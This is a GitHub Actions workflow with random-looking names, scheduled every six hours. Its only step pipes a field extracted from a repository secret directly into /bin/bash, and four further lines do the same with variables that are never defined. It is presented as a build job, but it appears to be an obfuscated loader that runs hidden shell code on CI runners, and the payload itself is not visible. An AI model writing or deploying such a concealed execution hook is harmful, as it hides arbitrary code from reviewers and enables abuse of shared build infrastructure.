name: longguozheng7615
on:
  workflow_dispatch:
  schedule:
    - cron: '22 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: longguozheng7615
        env:
          xux842: ${{ secrets.xux842 }}
        run: |
          echo $xux842 | jq -r .z389 | /bin/bash
          echo $a98 | jq -r .bzhw44933 | /bin/bash
          echo $vdqam91 | jq -r .vv04 | /bin/bash
          echo $yuoje02078 | jq -r .gwk6 | /bin/bash
          echo $gzfsq928 | jq -r .evzz1 | /bin/bash

